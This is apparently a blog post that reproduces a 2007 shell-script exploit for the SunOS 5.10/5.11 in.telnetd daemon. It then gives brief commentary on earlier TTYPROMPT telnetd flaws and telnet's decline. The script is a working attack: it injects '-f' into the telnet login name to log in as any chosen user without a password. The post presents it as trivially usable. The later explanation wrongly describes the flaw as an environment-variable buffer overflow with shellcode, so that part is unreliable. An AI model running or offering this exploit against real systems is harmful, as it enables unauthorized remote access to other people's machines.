This is a serious overlook in something so trivial. Just check out this publicly released code on packetstorm and how little is needed to become any user on that system!
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos "
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1


The telnet daemon in.telnetd, especially the solaris/sunos one, has had quite a number of problems in the past, here’s an old exploit relating to a problem with TTYPROMPT, systems vulnerable are SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8.

This new vulnerability is very similiar to the old one where an environment variable was the problem. Usually in such cases, they contain quite a large number of characters, so when a user logs in using telnet, those variables are read, thus overflowing the buffer and usually they contain some shellcode to execute code when this occurs.

These days, telnet is seldom used for unix logins, usually ssh is preferred because of its extra security settings and encryption, although telnet is still around on network devices such as routers or switches which don’t support ssh.